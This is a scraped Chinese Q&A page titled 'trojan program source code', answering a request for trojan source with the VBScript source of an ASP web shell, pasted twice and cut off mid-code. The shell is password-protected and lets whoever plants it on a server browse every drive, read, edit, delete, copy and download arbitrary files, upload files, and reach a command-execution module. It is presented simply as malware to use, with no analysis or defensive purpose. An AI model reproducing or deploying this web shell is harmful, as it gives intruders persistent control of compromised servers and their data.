木马程序源码
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了木马程序源码相关的知识,希望对你有一定的参考价值。
谁知道常见木马程序的源代码???
一个asp木马:<%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP上传程序 Version 2.0"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case "list.asp"%>
<%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href='" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"'><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script><%
end if
End Sub
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">
<!--
table font-family: 宋体; font-size: 9pt
a font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none
a:hover font-family: 宋体; color: rgb(255,0,0); text-decoration: none
a:visited color: rgb(128,0,0)
td font-size: 9pt
a color: #000000; text-decoration: none
a:hover text-decoration: underline
.tx height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF
.bt font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand
.tx1 height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF
-->
</style>
</head>
<script language="JavaScript">
function crfile(ls)
if (ls=="")alert("请输入文件名!");
else window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);
return false;
function crdir(ls)
if (ls=="")alert("请输入文件名!");
else window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);
return false;
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""><td width='50%'><font color='#FF8000'><font face=Wingdings>+</font></font><a href='"& urlpath & lpath & xName &"' target='_blank'><strong>" & showstring & "</strong></a></td><td width='20%' align='right'>" & size & "字节</td><td width='30%'><a href='#' title='类型:" & type1 & chr(10) & "属性:" & Attributes & chr(10) & "时间:" & DateLastModified &"'>属性</a> <a href='<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>编辑</a> <a href="&chr(34)&"javascript: rmdir1('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>删除</a> <a href='#' onclick=copyfile('" & lpath & Name & "')><font color='#FF8000' ></font>复制</a> <a href='<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>下载</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
document.write "<a href='<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'>└<font color='#FF8000'><font face=Wingdings>1</font></font> " & xName &"</a> <a href="&chr(34)&"javascript: rmdir('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>删除</a><br>"
end sub
sub rmdir1(ls)
if confirm("你真的要删除这个文件吗!"&Chr(13)&Chr(10)&"文件为:"&ls) then
window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub rmdir(ls)
if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为:"&ls) then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub copyfile(sfile)
dfile=InputBox("※文件复制※"&Chr(13)&Chr(10)&"源文件:"& sfile&Chr(13)&Chr(10)&"输入目标文件的文件名:"&Chr(13)&Chr(10) &"[允许带路径,要根据你的当前路径模式]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "对不起,你在相对路径模式下不能使用绝对路径"&Chr(13)&Chr(10)&"错误路径:["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您没有输入文件名!"
end If
end sub
</script>
<body>
<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"
bordercolordark="#FFFFFF" cellspacing="0">
<tr>
<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"
color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※换盘:<span
style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%
For Each thing in oFileSys.Drives
Response.write "<font face=Wingdings>:</font><a href='" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&":</a>"
NEXT
%> </span> 地址:
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※<%
if Request("attrib")="true" then
response.write "<a href='" & rseb & "?q=list.asp'>切到相对路径</a>"
else
response.write "<a href='" & rseb & "?attrib=true&q=list.asp'>切到绝对路径</a>"
end if
%> ※绝对:<span
style="background-color: rgb(255,255,255)"><%=cpath%></span></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※当前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>
</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">
编辑|
<input class="tx1" type="text" name="filename" size="20">
<input class="tx1" type="button" value="建文" onclick="crfile(form1.filename.value)">
<input class="tx1" type="button" value="建目" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="tx1" style="width:100" value="">
<input type="text" name="filepath" class="tx1" style="width:100" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="tx" value="1">
<input class="tx1" type="submit" value="上传">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=cmd.asp','_blank')" value="命令">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=test.asp','_blank')" value="配置">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=p.asp','_blank')" value="nfso">
</td>
</td>
</tr></form>
<tr>
<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>
</td>
<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>
</td>
</tr>
</table>
<%else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%case "edit.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>编辑源代码</title>
<style>
<!--
table font-family: 宋体; font-size: 12pt
a font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none
a:hover font-family: 宋体; color: rgb(255,0,0); text-decoration: underline
a:visited color: rgb(128,0,0)
-->
</style>
</head>
<body>
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write "<script>alert('删除成功!要刷新才能看到效果');window.close();</script>"
else
if request("op")="copy" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.copy dsfile
%>
<script language=vbscript>
msgbox "源文件:<%=whichfile%>" & vbcrlf & "目的文件:<%=dsfile%>" & vbcrlf & "复制成功!要刷新才能看到效果!"
window.close()
</script>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<form method="POST" action="<%=rseb%>?q=edit.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"
width="700" cellpadding="0">
<tr>
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45"
value="<%=Request("path")%> ">直接更改文件名,相当于“另存为”</td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"
value="提交" name="B1"><input type="reset" value="复原" name="B2"></td>
</tr>
</table>
</form>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write "<script>alert('修改成功!要刷新才能看到效果');window.close();</script>"
end if
end if
end if
else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%case "edir.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>目录操作</title>
<style>
<!--
table font-family: 宋体; font-size: 12pt
a font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none
a:hover font-family: 宋体; color: rgb(255,0,0); text-decoration: underline
a:visited color: rgb(128,0,0)
-->
</style>
</head>
<body>
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write "<script>alert('删除的目录为:" & whichdir & "删除成功!要刷新才能看到效果');window.close();</script>"
else
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write "<script>alert('建立的目录为:" & whichdir & "建立成功!要刷新才能看到效果');window.close();</script>"
end if
end if
else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize> 参考技术A <%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP上传程序 Version 2.0"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<tr>
<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p>Enter Password:<input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">
<input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"></p>
</center></div>
</form>
</td>
</tr>
</table>
</body>
</html>
<%end if%>
<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case "list.asp"%>
<%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href='" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"'><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script><%
end if
End Sub
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">
<!--
table font-family: 宋体; font-size: 9pt
a font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none
a:hover font-family: 宋体; color: rgb(255,0,0); text-decoration: none
a:visited color: rgb(128,0,0)
td font-size: 9pt
a color: #000000; text-decoration: none
a:hover text-decoration: underline
.tx height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF
.bt font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand
.tx1 height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF
-->
</style>
</head>
<script language="JavaScript">
function crfile(ls)
if (ls=="")alert("请输入文件名!");
else window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);
return false;
function crdir(ls)
if (ls=="")alert("请输入文件名!");
else window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);
return false;
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""><td width='50%'><font color='#FF8000'><font face=Wingdings>+</font></font><a href='"& urlpath & lpath & xName &"' target='_blank'><strong>" & showstring & "</strong></a></td><td width='20%' align='right'>" & size & "字节</td><td width='30%'><a href='#' title='类型:" & type1 & chr(10) & "属性:" & Attributes & chr(10) & "时间:" & DateLastModified &"'>属性</a> <a href='<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>编辑</a> <a href="&chr(34)&"javascript: rmdir1('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>删除</a> <a href='#' onclick=copyfile('" & lpath & Name & "')><font color='#FF8000' ></font>复制</a> <a href='<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"' target='_blank' ><font color='#FF8000' ></font>下载</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
document.write "<a href='<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'>└<font color='#FF8000'><font face=Wingdings>1</font></font> " & xName &"</a> <a href="&chr(34)&"javascript: rmdir('"& lpath & xName &"')"&chr(34)&"><font color='#FF8000' ></font>删除</a><br>"
end sub
sub rmdir1(ls)
if confirm("你真的要删除这个文件吗!"&Chr(13)&Chr(10)&"文件为:"&ls) then
